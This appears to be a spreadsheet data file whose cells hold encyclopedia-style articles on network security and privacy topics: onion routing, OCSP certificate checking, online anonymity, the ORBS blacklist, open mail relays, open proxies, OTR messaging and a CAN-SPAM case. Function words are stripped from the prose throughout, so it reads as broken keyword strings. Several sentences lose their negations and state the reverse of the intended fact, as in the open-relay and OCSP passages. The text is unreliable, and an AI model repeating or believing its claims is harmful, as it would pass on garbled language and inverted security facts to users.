evidence cruise.com emails caused mummagraphics nominal damages. court explained trespass chattel common tort committed intentionally dispossessing another chattel, using intermeddling chattel possession another. such claims brought trespasser disposes chattel, chattel impaired condition, quality value, processor deprived chattel substantial time, body harm caused possessor, harm caused person thing possessor legally protected interest.the court noted oklahoma court earlier recognized trespass chattels based upon intangible invasions commuter resources. courts recognized causes action allowed action nominal damages harmless intermeddling chattel." here, mummagraphics failed submit evidence receiving commercial emails cruise.com placed meaningful burden computer system. thus summary judgment appropriate claim. policy considerations finally, commenting frustration consternation unsolicited commercial e-mails created among large number internet users, court stated role determine best regulating unsolicited commercial e-mails. instead, purpose merely implement balance congress sought struck can-spam act. reactions after omega world travel, commentators concerned fourth circuit's interpretation can-spam frustrate consumers' self-help measures insulate spammers prosecution. some commented decision made "the narrow ineffective spam even narrow ineffective." also general information can-spam 2003 federal preemption cyber journal articles spam-a-lot: states' crusade unsolicited e-mail light can-spam overbreadth doctrine can-spam 2003: false hope effectiveness litigation under can-spam act. references</t>
  </si>
  <si>
    <t>One-key MAC</t>
  </si>
  <si>
    <t>Onion routing</t>
  </si>
  <si>
    <t>onion routing technique anonymous communication computer network. onion network, messages encapsulated layers encryption, analogous layers onion. encrypted data transmitted series network nodes called onion routers, "peels" away single layer, uncovering data's next destination. when final layer decrypted, message arrives destination. sender remains anonymous intermediary knows location immediately preceding following nodes. while onion routing provides high level security anonymity, methods break anonymity technique, timing analysis. history onion routing developed mid-1990s u.s. naval research laboratory employees paul syverson, michael reed, david goldschlag protect u.s. intelligence communications online. developed defense advanced research projects agency (darpa) patented navy 1998.this method publicly released employees publishing article ieee journal communications year. depicted method protect user network outside observers eavesdrop conduct traffic analysis attacks. important part research configurations applications onion routing existing e-services, virtual private network, web-browsing, email, remote login, electronic cash.based existing onion routing technology, computer scientists roger dingledine nick mathewson joined paul syverson 2002 develop become largest best-known implementation onion routing, called onion routing project (tor project). after naval research laboratory released code free license, dingledine, mathewson five others founded project non-profit organization 2006, financial support electronic frontier foundation several organizations. data structure metaphorically, onion data structure formed "wrapping" message successive layers encryption decrypted ("peeled" "unwrapped") many intermediary computers layers arriving destination. original message remains hidden transferred node next, intermediary knows origin final destination data, allowing sender remain anonymous. onion creation transmission create transmit onion, originator selects nodes list provided "directory node". chosen nodes arranged path, called "chain" "circuit", message transmitted. preserve anonymity sender, node circuit able tell whether node originator another intermediary like itself. likewise, node circuit able tell many nodes circuit final node, "exit node", able determine location chain.using asymmetric cryptography, originator obtains public directory node send encrypted message first ("entry") node, establishing connection shared secret ("session key"). using established encrypted link entry node, originator relay message first node second node chain using encryption second node, first, decrypt. when second node receives message, establishes connection first node. while extends encrypted link originator, second node cannot determine whether first node originator another node circuit. originator send message first second nodes third node, encrypted third node able decrypt third, second, becomes linked originator connects second. this process repeated build larger larger chains, typically limited preserve performance.when chain complete, originator send data internet anonymously. when final recipient data sends data back, intermediary nodes maintain link back originator, data layered, reverse final node time adds first layer encryption first node adds last layer encryption sending data, example page, originator, able decrypt layers. weaknesses timing analysis reasons typical internet connections considered anonymous, ability internet service providers trace connections computers. example, person accesses particular website, data secured connection like https user's password, emails, content visible outside party, record connection itself, time occurred, amount data transferred. onion routing creates obscures path computers there's discernible connection directly person website, still exists records connections computers. traffic analysis searches records connections made potential originator tries match timing data transfers connections made potential recipient. attacker compromised ends route, sender seen transferred amount data unknown computer specified amount seconds different unknown computer transferred data exact size particular destination. factors facilitate traffic analysis include nodes failing leaving network compromised node keeping track session occurs chains periodically rebuilt.garlic routing variant onion routing associated network encrypts multiple messages together, increases speed data transfer makes difficult attackers perform traffic analysis. exit node vulnerability although message sent transmitted inside several layers encryption, exit node, final node chain, decrypt final layer deliver message recipient. compromised exit node thus able acquire data transmitted, potentially including passwords, private messages, bank account numbers, forms personal information. egerstad, swedish researcher, used attack collect passwords email accounts related foreign embassies.exit node vulnerabilities similar unsecured wireless networks, data transmitted user network intercepted another user router operator. both issues solved using secure end-to-end connection like ssl/tls secure http (s-http). end-to-end encryption sender recipient, sender lured trusting false certificate offered exit node, even last intermediary view original message. also references external links onion-router.net site formerly hosted center high assurance computer systems u.s. naval research laboratory sylverson, goldschlag, reed, (1997). "anonymous connections onion routing". ieee symposium security privacy. citeseerx: 10.1.1.64.4829 original paper naval research laboratory</t>
  </si>
  <si>
    <t>Online Certificate Status Protocol</t>
  </si>
  <si>
    <t>online certificate status protocol (ocsp) internet protocol used obtaining revocation status x.509 digital certificate. described 6960 internet standards track. created alternative certificate revocation lists (crl), specifically addressing certain problems associated using crls public infrastructure (pki). messages communicated ocsp encoded asn.1 usually communicated http. "request/response" nature messages leads ocsp servers termed ocsp responders. some browsers (firefox) ocsp validate https certificates, others disabled most ocsp revocation statuses internet disappear soon certificate expiration. comparison crls since ocsp response contains less data typical certificate revocation list (crl), puts less burden network client resources. since ocsp response less data parse, client-side libraries handle less complex handle crls. ocsp discloses responder particular network host used particular certificate particular time. ocsp mandate encryption, parties intercept information. basic implementation alice public certificates issued carol, certificate authority (ca). alice wishes perform transaction sends public certificate. bob, concerned alice's private compromised, creates 'ocsp request' contains alice's certificate serial number sends carol. carol's ocsp responder reads certificate serial number bob's request. ocsp responder uses certificate serial number look revocation status alice's certificate. ocsp responder looks database carol maintains. scenario, carol's database trusted location compromise alice's certificate would recorded. carol's ocsp responder confirms alice's certificate still returns signed, successful 'ocsp response' bob. cryptographically verifies carol's signed response. stored carol's public sometime transaction. uses carol's public verify carol's response. completes transaction alice. protocol details ocsp responder server typically certificate issuer) return signed response signifying certificate specified request 'good', 'revoked', 'unknown'. cannot process request, return error code. ocsp request format supports additional extensions. this enables extensive customization particular scheme. ocsp vulnerable replay attacks, signed, 'good' response captured malicious intermediary replayed client later date subject certificate revoked. ocsp allows nonce included request included corresponding response. because high load, ocsp responders nonce extension create different response request, instead using presigned responses validity period multiple days. thus, replay attack major threat validation systems. ocsp support level ocsp requests chained peer responders query issuing appropriate subject certificate, responders validating other's responses root using ocsp requests. ocsp responder queried revocation information delegated path validation (dpv) servers. ocsp not, itself, perform supplied certificates. signs response need signed certificate. certificate's issuer delegate another authority ocsp responder. case, responder's certificate (the used sign response) must issued issuer certificate question, must include certain extension marks ocsp signing authority (more precisely, extended usage extension {iso(1) identified-organization(3) dod(6) internet(1) security(5) mechanisms(5) pkix(7) keypurpose(3) ocspsigning(9)}) privacy concerns ocsp checking creates privacy concern users, since requires client contact third party (albeit party trusted client software vendor) confirm certificate validity. ocsp stapling verify validity without disclosing browsing behavior criticisms ocsp-based revocation effective technique mitigate compromise https server's private key. attacker compromised server's private typically needs man-in-the-middle position network abuse private impersonate server. attacker position also typically position interfere client's ocsp queries. because clients silently ignore ocsp query times out, ocsp reliable means mitigating https server compromise.the muststaple extension certificate require certificate verified stapled ocsp response, mitigating problem. ocsp also remains valid defense situations attacker "man-in-the-middle" (code-signing certificates issued error). ocsp protocol assumes requester network access connect appropriate ocsp responder. some requesters able connect local network prohibits direct internet access common practice internal nodes data center). forcing internal servers connect internet order ocsp contributes de-perimeterisation trend. ocsp stapling protocol alternative allows servers cache ocsp responses, removes need requestor directly contact ocsp responder. browser support there wide support ocsp amongst major browsers: internet explorer built cryptoapi windows thus starting version windows vista (not supports ocsp checking. versions mozilla firefox support ocsp checking. firefox enables ocsp checking default. safari macos supports ocsp checking. enabled default 10.7 (lion). prior that, manually activated keychain preferences. versions opera current version support ocsp checking.however, google chrome outlier. google disabled ocsp checks default 2012, citing latency privacy issues instead uses update mechanism send revoked certificates browser. implementations several open source proprietary ocsp implementations exist, including fully featured servers libraries building custom applications. ocsp client support built many operating systems, browsers, network software popularity https world wide web. server open source boulder, ocsp responder developed used let's encrypt (go) dogtag, open source certificate authority ocsp responder. ejbca, ocsp responder (java) xipki, ocsp responder. with support 6960 sha3 (java) proprietary certificate services ocsp responder included windows server library open source cfssl (go) openssl wolfssl client also certificate revocation list certificate authority server-based certificate validation protocol ocsp stapling certificate transparency references external links public infrastructure: operational protocols curlie 2560, x.509 internet public infrastructure online certificate status protocol ocsp 4806, online certificate status protocol (ocsp) extensions ikev2 5019, lightweight online certificate status protocol (ocsp) profile high-volume environments 6960, x.509 internet public infrastructure online certificate status protocol ocsp processor.com april, 2009 article online certificate status protocol</t>
  </si>
  <si>
    <t>Online anonymity</t>
  </si>
  <si>
    <t>anonymity describes situations acting person's identity unknown. some writers argued namelessness, though technically correct, capture centrally stake contexts anonymity. important idea person non-identifiable, unreachable, untrackable. anonymity seen technique, realizing, certain values, privacy, liberty. over past years, anonymity tools used dark criminals malicious users drastically altered ability enforcement conventional surveillance techniques.an important example anonymity protected, enforced vote free elections. many situations (like conversation strangers, buying product service shop), anonymity traditionally accepted natural. there also various situations person might choose withhold identity. acts charity performed anonymously benefactors wish acknowledged. person feels threatened might attempt mitigate threat anonymity. witness crime might seek avoid retribution, example, anonymously calling crime tipline. criminals might proceed anonymously conceal participation crime. anonymity also created unintentionally, loss identifying information passage time destructive event. certain situations, however, illegal remain anonymous. united states, states "stop identify" statutes require persons detained self-identify requested enforcement officer. term "anonymous message" typically refers message reveal sender. many countries, anonymous letters protected must delivered regular letters. mathematics, reference arbitrary element (e.g., human, object, computer), within well-defined (called "anonymity set"), "anonymity" element refers property element identifiable within set. identifiable, element said "anonymous." pseudonymity sometimes person desire long-term relationship (such reputation) another party without necessarily disclosing personally identifying information party. case, useful person establish unique identifier, called pseudonym. examples pseudonyms names, nicknames, credit card numbers, student numbers, bank account numbers, etc. pseudonym enables party link different messages person and, thereby, establish long-term relationship. pseudonyms widely used social networks virtual communication, although recently important service providers like google discourage pseudonymity. someone using pseudonym would strictly considered using "pseudonymity" "anonymity", sometimes latter used refer general, situation legal identity person disguised) psychological effects anonymity reduce accountability perceives actions, removes impact actions might otherwise reputation. this dramatic effects, useful harmful various parties involved. thus, used psychological tactics involving respective party purport support discredit sort activity belief. conversational settings, anonymity allow people reveal personal history feelings without fear later embarrassment. electronic conversational media provide physical isolation, addition anonymity. this prevents physical retaliation remarks, prevents negative taboo behavior discussion tarnishing reputation speaker. this beneficial discussing private matters, taboo subjects expressing views revealing facts someone physical, financial, legal danger (such illegal activity, unpopular, outlawed political views). work settings, three common forms anonymous communication traditional suggestion boxes, written feedback, caller blocking. additionally, appropriateness anonymous organizational communication varies depending use, organizational surveys assessments typically perceived highly appropriate firing perceived highly inappropriate. anonymity appropriateness also found significantly related quality relationships others work. with perceived negative consequences, anonymous semi-anonymous forums often provide soapbox disruptive conversational behavior. term "troll" sometimes used refer engage disruptive behavior. relative anonymity often enjoyed large crowds. different people different psychological philosophical reactions development, especially modern phenomenon. this anonymity important factor crowd psychology, behavior situations riot. this perceived anonymity compromised technologies photography. groupthink behavior conformity also considered established effect internet anonymity.anonymity also permits highly trained professionals judges freely express regarding strategies employ perform jobs objectively. anonymity, commerce, crime anonymous commercial transactions protect privacy consumers. some consumers prefer cash buying everyday goods (like groceries tools), prevent sellers aggregating information soliciting future. credit cards linked person's name, used discover information, postal address, phone number, etc. ecash system developed allow secure anonymous transactions. another example would enymity, actually makes purchase customer's behalf. when purchasing taboo goods services, anonymity makes many potential consumers comfortable willing engage transaction. many loyalty programs cards personally identify consumer engaging transaction (possibly later solicitation, redemption security purposes), numerical pseudonym, data mining. anonymity also used protection legal prosecution. example, committing unlawful actions, many criminals attempt avoid identification means obscuring/covering faces scarves masks, wear gloves hand coverings order leave fingerprints. organized crime, groups criminals collaborate certain project without revealing names personally identifiable information. movie thomas crown affair depicted fictional collaboration people never previously know recruited them. anonymous purchase knife used crime helps prevent linking abandoned weapon identity perpetrator. anonymity charity there aspects, one, giving large charitable organization obscures beneficiary donation benefactor, giving anonymously obscure benefactor beneficiary everyone else. anonymous charity long widespread durable moral precept many ethical religious systems, well practice widespread human activity. benefactor wish establish relationship beneficiary, particularly beneficiary perceived unsavory. benefactors wish identify capable giving. benefactor wish improve world, long knows modesty, wishing avoid publicity. another reason anonymous charity benefactor want charitable organization pursue donations, sometimes aggressively. issues facing anonymous attempts anonymity always support society. anonymity sometimes clashes policies procedures governments private organizations. united states, disclosure identity required able vote, though secret ballot prevents disclosure individual voting patterns. airports countries, passengers allowed board flights unless identified airline transportation security personnel, typically form presentation identification card. hand, policies procedures require anonymity. referring anonymous when necessary refer someone anonymous, typically necessary create type pseudo-identification person. literature, common state identity author unknown refer simply "anonymous". this usually case older texts author long dead unable claim authorship work. when work claims famous author pseudonymous author identified "pseudo-", pseudo-dionysius areopagite, author claiming—and long believed—to dionysius areopagite, early christian convert. anonymus, latin spelling, generally specific city designation, traditionally used scholars humanities refer ancient writer whose name known, manuscript work. many writers left valuable historical literary records: incomplete list anonymi anonymus. history art, many painting workshops identified characteristic style discussed workshop's output chronological order. sometimes archival research later identifies name, "master flémalle"—defined three paintings städelsches kunstinstitut frankfurt— identified robert campin. 20th-century historian bernard berenson methodically identified numerous early renaissance florentine sienese workshops sobriquets "amico sandro" anonymous painter immediate circle sandro botticelli. legal cases, popularly accepted name determined individual needs maintain anonymity "john doe". this name often modified "jane doe" anonymity-seeker female. names also commonly used identification dead person known. semi-acronym unsub used enforcement slang "unknown subject investigation". military often feels need honor remains soldiers identification impossible. many countries, memorial named tomb unknown soldier. anonymity press most modern newspapers magazines attribute articles individual editors, news agencies. exception markker weekly economist. british newspapers leaders, editorials, anonymously. economist fully adopts policy, saying "many hands write economist, speaks collective voice". guardian considers "people often speak honestly allowed speak anonymously". according ross eaman, book journalism, mid-19th century, writers great britain, especially less well known, sign names work newspapers, magazines reviews. anonymity internet most commentary internet essentially done anonymously, using unidentifiable pseudonyms. however widely discredited study university birmingham, found number people internet anonymously statistically number people internet interact friends known contacts. while usernames take identity own, sometimes separated anonymous actual author. according university stockholm creating freedom expression, less accountability. wikipedia collaboratively written mostly authors using either unidentifiable pseudonyms address identifiers, although used identified pseudonyms real names.however, internet designed anonymity: addresses serve virtual mailing addresses, means time resource internet accessed, accessed particular address, data traffic patterns addresses intercepted, monitored, analysed, even content traffic encrypted. this address mapped particular internet service provider (isp), provide information customer address leased this necessarily implicate specific individual (because people could using customer's connection, especially customer public resource, library), provides regional information serves powerful circumstantial evidence.anonymizing services address issue tracking. short, work encrypting packets within multiple layers encryption. packet follows predetermined route anonymizing network. each router sees immediate previous router origin immediate next router destination. thus, router ever knows true origin destination packet. this makes services secure centralized anonymizing services (where central point knowledge exists).sites chatroulette, omegle, tinder (which pair random users conversation) capitalized fascination anonymity. apps like yak, secret whisper people share things anonymously quasi-anonymously whereas random user explore anonymously. other sites, however, including facebook google+, users sign legal names. case google+, requirement controversy known nymwars.the prevalence cyberbullying often attributed relative internet anonymity, fact potential offenders able mask identities prevent caught. principal high school stated comments made anonymous site "especially vicious hurtful since trace source disseminated widely. "cyberbullying, opposed general bullying, still widely-debated area internet freedom several states.though internet anonymity provide harmful environment people hurt others, anonymity allow much safer relaxed internet experience. study conducted carnegie mellon university, participants stated choose anonymous online prior negative experience maintain anonymous presence. such experiences include stalking, releasing private information opposing school political group, tricking individual traveling another country exist. participants study stated able avoid previous problems using false identification online.david chaum called godfathers anonymity claim great visionaries contemporary science. early 1980s, computer scientist berkeley, chaum predicted world computer networks would make mass surveillance possibility. joss wright explains: "david chaum ahead time. predicted early 1980s concerns would arise internet years later." there people though consider anonymity internet danger society whole. david davenport, assistant professor computer engineering department bilkent university ankara, turkey, considers allowing anonymous communication, fabric society risk. "accountability requires responsible misconduct identified brought justice. however, people remain anonymous, definition, cannot identified, making impossible hold accountable." says. arguments anonymity michael froomkin says: "the regulation anonymous pseudonymous communications promises important contentious internet-related issues next decade". anonymity pseudonymity used good purposes. anonymity many cases desirable person desirable another person. company may, example, like employee divulge information improper practices within company, society whole find important improper practices publicly exposed. good purposes anonymity pseudonymity: people dependent organization, afraid revenge, divulge serious misuse, revealed. anonymous tips used information source newspapers, well police departments, soliciting tips aimed catching criminals. everyone regard anonymous communication good. example, message boards established outside companies, employees companies vent opinions employer, sometimes used ways least companies happy [abelson 2001]. police anonymity complex issue, since police often want know identity tipper order information, evaluate reliability tipper witness. ethical police identify tipper opened anonymous tipping hotline? people country repressive political regime anonymity (for example internet-based anonymity servers countries) avoid persecution political opinions. note even democratic countries, people claim, rightly wrongly, certain political opinions persecuted. [wallace 1999] gives overview uses anonymity protect political speech. every country limit political opinions allowed, always people want express forbidden opinions, like racial agitation democratic countries. people openly discuss personal stuff would embarrassing tell many people about, sexual problems. research shows anonymous participants disclose significantly information [joinson 2001]. people might also feel open sharing personal work anonymously feel friends family would harass disapprove work. examples work could include fiction vocal performances. people objective evaluation messages, showing real name. people equal anonymous discussions, factors like status, gender, etc., influence evaluation say. pseudonymity used experiment role playing, example posing woman order understand feelings people different gender. pseudonymity tool timid people dare establish contacts value others, e.g. contact advertisements. people contribute online social discussion reduced risk harm online predators. online predators include "criminals, hackers, scammers, stalkers, malicious online vendors." people avoid becoming famous publishing work anonymously.there always, however, also negative side anonymity: anonymity used protect criminal performing many different crimes, example slander, distribution child pornography, illegal threats, racial agitation, fraud, intentional damage distribution computer viruses, etc. exact illegal acts varies country country, countries many laws forbidding certain "informational" acts, everything high treason instigation rebellion, etc., swindling. anonymity used online payments criminals paying others perform illegal acts purchases. anonymity used seek contacts performing illegal acts, like child grooming searching children abuse swindler searching people off. even illegal, anonymity used offensive disruptive communication. example, people anonymity order harmful things people, known cyberbullying. internet trolls anonymity harm discussions online social platforms.the border illegal legal offensive sharp, varies depending country. anonymous (group) anonymous (used mass noun) loosely associated international network activist hacktivist entities. website nominally associated group describes internet gathering" loose decentralized command structure operates ideas rather directives". group became known series well-publicized publicity stunts distributed denial-of-service (ddos) attacks government, religious, corporate websites. image commonly associated anonymous "man without head" represents leaderless organization anonymity. legal protection anonymity anonymity perceived right many, especially anonymity internet communications. partial right anonymity legally protected various degrees different jurisdictions. united states tradition anonymous speech older united states. founders alexander hamilton, james madison, john wrote federalist papers pseudonym "publius" "the federal farmer" spoke rebuttal. supreme court repeatedly recognized rights speak anonymously derived first amendment. right anonymous political campaigning established u.s. supreme court decision mcintyre ohio elections commission (1995) case: "anonymity shield tyranny majority...it thus exemplifies purpose behind bill rights, first amendment particular: protect unpopular individuals retaliation—and ideas suppression—at hand intolerant society". supreme court explained protecting anonymous political speech receives highest protection however, priority takes dimensions digital age. right individuals "anonymous communication" established decision case columbia insurance company seescandy.com, (1999) united states district court northern district california: "people permitted interact pseudonymously anonymously long acts violation law". right individuals "anonymous reading" established u.s. supreme court decision united states rumely (1953): "once government demand publisher names purchasers publications, free press know disappears. then spectre government agent look shoulder everyone reads".the pressure anonymous communication grown substantially 2001 terrorist attack world trade center subsequent political climate. although still difficult oversee exact implications, measures patriot act, european cybercrime convention european union rules data retention signs exercise right anonymous exchange information substantial pressure.an above-mentioned 1995 supreme court ruling mcintyre ohio elections commission reads: "(...) protections anonymous speech vital democratic discourse. allowing dissenters shield identities frees express critical minority views anonymity shield tyranny majority. thus exemplifies purpose behind bill rights first amendment particular: protect unpopular individuals retaliation hand intolerant society." however, anonymous online speech without limits. clearly demonstrated case 2008, defendant stated law-school discussion board women raped, anonymous poster's comments extend beyond free speech protections. case, connecticut federal court must apply standard decide whether poster's identity revealed. there several tests, however, court could apply considering issue. european union right internet anonymity also covered european legislation recognizes fundamental right data protection, freedom expression, freedom impression. european union charter fundamental rights recognizes article. (title “freedoms”) right everyone protection personal data concerning him. right privacy essentially individual's right maintain control information him. international legislation controversial international legal acts, regarding subject anti-counterfeiting trade agreement (acta). february 2015, treaty signed -but ratified- states well european union. japan october 2012 first ratify treaty. creates international regime imposing civil criminal penalties internet counterfeiting copyright infringement. although acta intentionally vague, leaving signatories draw precise rules themselves, critics could mean innocent travellers laptops searched unlicensed music, jailed carrying generic drug. infringers could liable total loss potential sales (implying everyone buys counterfeit product would bought real thing). applies unintentional copyright material. puts onus website owners ensure comply laws across several territories. negotiated secretively outside established international trade bodies, despite criticisms. anonymity politics history anonymous expression political dissent long important effect, letters junius voltaire's candide, scurrilous pasquinades. tradition anonymous british political criticism, federalist papers anonymously authored three america's founding fathers. without public discourse controversial contents u.s. constitution, ratification would likely taken much longer individuals worked issues. united states declaration independence, however, anonymous. unsigned, might well less effective. john perry barlow, joichi ito, u.s. bloggers express strong support anonymous editing basic requirements open politics conducted internet. anonymity pseudonymity anonymity directly related concept obscurantism pseudonymity, artist group attempts remain anonymous, various reasons adding element mystique work, attempting avoid known "cult personality" hero worship charisma, good looks, wealth unrelated mildly related aspects people main reason interest work, rather work itself) break field area interest normally dominated males famous science fiction author james tiptree, actually woman named alice bradley sheldon, likely leroy). some seem want avoid "limelight" popularity live private lives, thomas pynchon, salinger, onbekende beeldhouwer anonymous sculptor whose exhibited work amsterdam attracted strong attention 1980s 1990s), daft punk (1993-2021). street artist banksy, "anonymity vital graffiti illegal".anonymity used music avant-garde ensemble residents, jandek (until 2004), costumed comedy rock band radioactive chicken heads, deadmau5 (1998-present) marshmello (2015-present). this frequently applied fiction, lone ranger, superman, batman, hidden identity assumed. mathematics anonymity suppose alice, bob, carol keys bank safe that, day, contents safe missing (lock violated). without additional information, cannot know sure whether alice, carol emptied safe. notably, element {alice, bob, carol} could perpetrator probability however, long none convicted 100% certainty, must hold perpetrator remains anonymous attribution probability players remain undecided. carol definite alibi time perpetration, deduce must either alice emptied safe. particular case, perpetrator completely anonymous anymore, alice know "who probability also list anonymously published works list anonymous masters notname data anonymization friend-to-friend internet privacy online disinhibition effect personally identifiable information anonymity (social choice) notes references</t>
  </si>
  <si>
    <t>Open Relay Behavior-modification System</t>
  </si>
  <si>
    <t>open relay behavior-modification system (orbs), created alan brown zealand, first dns-based blackhole lists (dnsbl), means internet domain publish list addresses, database easily queried automatically computer programs internet. orbs list used blacklist addresses open mail relays, third-party mail servers spammers relay messages thus attempt obfuscate source spam. controversy orbs list controversial number reasons. many people felt methods orbs employed scan internet open mail servers could abusive. orbs used probes test open relays without permission, sometimes again. some claimed testing networks continued even asked orbs stop, others claimed relayed spam stop either. cases tests interfered mail servers, causing delays, especially servers assigned hundreds addresses. related testing regime, excessive eyes number email administrators, brown's policy adding servers unable test list, whether actually open relays, also matter dispute. another complaint open relays never sent spam listed without notice. false listings orbs also alleged, particularly brown engaged legal dispute listed party website created 2001 brad baker called stoporbs.org, offer assistance mail administrators listed orbs blacklist reasons open relays. many administrators felt listing servers reasons advertised (open relays), list reliable supposed purpose. lawsuits orbs created alan brown zealand. shut 2001 brown's health money issues lawsuits brought companies listed orbs, xtra actrix, refused remove. companies listed orbs blocked probes kept relaying spam. brown forced sell internet service provider, manawatu internet services, cover expenses, state companies listed inappropriately.brown also defamation lawsuit brought him, o'brien brown. court ruled brown made defamatory comments patrick o'brien, domainz, domain registrar. comments made domainz discussion group. when brown offered chance apologize, made additional defamatory comments. following o'brien's victory awarding $42,000 him, brown claimed worth $500, said lawyer aftermath several groups cached lists, retested open relays, replaced orbs. running open relay became even bigger problem before. dnsbls listing open relays effective spammers shifted insecure proxy servers. internet society zealand council seats (and subsequently domainz board) filled "rebel" members elections july 2000. o'brien departed singapore's internet registry. references</t>
  </si>
  <si>
    <t>Open mail relay</t>
  </si>
  <si>
    <t>open mail relay simple mail transfer protocol (smtp) server configured allows anyone internet send e-mail mail destined originating known users. this used default configuration many mail servers; indeed, internet initially open mail relays become unpopular exploitation spammers worms. many relays closed, placed blacklists servers. history technology until 1990s, mail servers commonly intentionally configured open relays; fact, frequently installation default setting. traditional store forward method relaying e-mail destination required passed computer computer (through beyond internet) modems telephone lines. many early networks, uucpnet, fidonet bitnet, lists machines open relays core part networks. filtering speed e-mail delivery priorities time case government educational servers initially internet covered federal edict forbidding transfer commercial messages. abuse spammers mid-1990s, rise spamming, spammers resorted re-routing e-mail third party e-mail servers avoid detection exploit additional resources open relay servers. spammers would send e-mail open relay (effectively) include large blind carbon copy list, open relay would relay spam entire list. while greatly reduced bandwidth requirements spammers time internet connections limited, forced spam exact copy thus easier detect. after abuse spammers became widespread, operating open relay came frowned upon among majority internet server administrators prominent users. open relays recommended 2505 5321 (which defines smtp). exact copy nature spam using open relays made easy create bulk e-mail detection systems vipul's razor distributed checksum clearinghouse. counter this, spammers forced switch using hash busters make less effective advantage using open relays removed since every copy spam "unique" sent individually. since open mail relays make effort authenticate sender e-mail, open mail relays vulnerable address spoofing. anti-spam efforts many internet service providers domain name system-based blackhole lists (dnsbl) disallow mail open relays. once mail server detected reported allows third parties send mail them, added lists, e-mail servers using lists reject mail coming sites. relay need actually used sending spam blacklisted; instead, blacklisted simple test confirms open access.this trend reduced percentage mail senders open relays well several years. this spammers adopt techniques, botnets zombie computers send spam. consequence unacceptability open relays inconvenience users certain internet service providers. allow customers e-mail addresses internet locations company's systems (such school work), many mail sites explicitly allowed open relaying customers could send e-mail location. once open relay became unacceptable abuse (and unusable blocking open relays), isps sites adopt protocols allow remote users send mail. these include smart hosts, smtp-auth, smtp, virtual private networks (vpns). internet engineering task force (ietf) written best current practices covering email submission operations 5068. note becomes issue user wishes continue send e-mail remotely, using smtp server previously accessing locally. valid access smtp server new, remote location, typically able server send e-mails address, even server properly secured. (although involve reconfiguration user's email client entirely straightforward.) can-spam 2003 makes illegal send spam open relay united states, makes provision personal e-mail operation general; effectiveness questioned. modern-day proponents famous open mail relay operating today probably john gilmore, argues running open relay freedom speech issue. server included many open relay blacklists (many generated "automatic detection", anti-spam blacklisters sending (unsolicited) test e-mail servers relayed). these measures cause much outgoing e-mail blocked. along deliberate configuration server, open relay enables people send e-mail without address directly visible recipient thereby send e-mail anonymously. 2002, open relay, along others, used computer worm propagate itself.john gilmore open relay proponents declare support spam spamming, bigger threat attempts limit capabilities block evolution new, next generation technologies. they compare network communication restrictions restrictions phone companies tried place lines past, preventing transferring computer data rather speech. closing relays order considered "open", e-mail relay secure configured accept forward following messages (details vary system system particular, restrictions well apply): messages local addresses local mailboxes messages local addresses non-local mailboxes messages non-local addresses local mailboxes messages clients authenticated authorizedin particular, properly secured smtp mail relay accept forward arbitrary e-mails non-local addresses non-local mailboxes unauthenticated unauthorized user. general, rules administrator chooses enforce (for instance, based e-mail gives envelope address) must addition rather instead above. not, relay still effectively open (for instance, rules): easy forge e-mail header envelope information, considerably harder successfully forge address tcp/ip transaction three-way handshake occurs connection started. open relays also resulted security flaws software, rather misconfiguration system administrators. cases, security patches need applied close relay. internet initiatives close open relays ultimately missed intended purpose, spammers created distributed botnets zombie computers contain malware mail relaying capability. number clients spammers' control great previous anti-spam countermeasures focused closing open relays longer effective. also relay (disambiguation) email spoofing email spam phishing dmarc dkim sender policy framework references</t>
  </si>
  <si>
    <t>Open proxy</t>
  </si>
  <si>
    <t>open proxy type proxy server accessible internet user. generally, proxy server allows users within network group (i.e. closed proxy) store forward internet services pages reduce control bandwidth used group. with open proxy, however, user internet able forwarding service. advantages anonymous open proxy useful looking online anonymity privacy, help users hide address servers since server requests appear originate proxy server. makes harder reveal identity thereby helps preserve perceived security browsing using internet services. real anonymity extensive internet security might achieved measure alone website operators client-side scripts determine browser's real address open proxy keeping logs connections. open proxies also stop tracking cookies fingerprinters identifying users.most public vpns work open proxies. disadvantages possible computer open proxy server without computer's owner knowing this result misconfiguration proxy software running computer, infection malware (viruses, trojans worms) designed purpose. caused malware, infected computer known zombie computer. testing access open proxy because open proxies often implicated abuse, number methods developed detect refuse service them. networks strict usage policies automatically test client systems known types open proxies. likewise, mail server configured automatically test mail senders open proxies, using software proxycheck.groups electronic mail operators dnsbls publishing lists addresses known open proxies, ahbl, cbl, njabl (till 2013), sorbs operation since 2002). ahbl discontinued public access 2015. also anonymizing proxy open mail relay references external links open proxies curlie</t>
  </si>
  <si>
    <t>Off-the-Record Messaging</t>
  </si>
  <si>
    <t>off-the-record messaging (otr) cryptographic protocol provides encryption instant messaging conversations. uses combination symmetric-key algorithm bits length, diffie–hellman exchange 1536 bits group size, sha-1 hash function. addition authentication encryption, provides forward secrecy malleable encryption. primary motivation behind protocol providing deniable authentication conversation participants keeping conversations confidential, like private conversation real life, record journalism sourcing. this contrast cryptography tools produce output later used verifiable record communication event identities participants. initial introductory paper named "off-the-record communication, pgp".the protocol designed cryptographers goldberg nikita borisov released october 2004. they provide client library facilitate support instant messaging client developers want implement protocol. pidgin kopete plugin exists allows used protocol supported pidgin kopete, offering auto-detection feature starts session buddies enabled, without interfering regular, unencrypted conversations. version protocol currently designed team sofía celi, reviewed unger goldberg. this version aims provide online offline deniability, update cryptographic primitives, support out-of-order delivery asynchronous communication. history presented 2004 nikita borisov, avrum goldberg, eric brewer improvement openpgp s/mime system "workshop privacy electronic society" (wpes). first version 0.8.0 reference implementation published november 2004. 2005 analysis presented mario raimondo, rosario gennaro, hugo krawczyk called attention several vulnerabilities proposed appropriate fixes, notably including flaw exchange. result, version protocol published 2005 implements variation proposed modification additionally hides public keys. moreover, possibility fragment messages introduced order deal chat systems limited message size, simpler method verification man-in-the-middle attacks implemented.in 2007 olivier goffart published mod_otr ejabberd, making possible perform man-in-the-middle attacks users check fingerprints. developers countered attack introducing socialist millionaire protocol implementation libotr. instead comparing checksums, knowledge arbitrary shared secret utilised relatively entropy tolerated using socialist millionaire protocol.version protocol published 2012. measure repeated reestablishment session case several competing chat clients signed user address time, precise identification labels sending receiving client instances introduced version moreover, additional negotiated used another data channel.several solutions proposed supporting conversations multiple participants. method proposed 2007 jiang bian, remzi seker, umit topaloglu uses system participant "virtual server". method called "multi-party off-the-record messaging" (mpotr) published 2009 works without central management host introduced cryptocat goldberg al.in 2013, signal protocol introduced, based messaging silent circle instant messaging protocol (scimp). brought support asynchronous communication ("offline messages") major feature, well better resilience distorted order messages simpler support conversations multiple participants. omemo, introduced android xmpp client called conversations 2015, integrates double ratchet algorithm used signal instant messaging protocol xmpp ("jabber") also enables encryption file transfers. autumn 2015 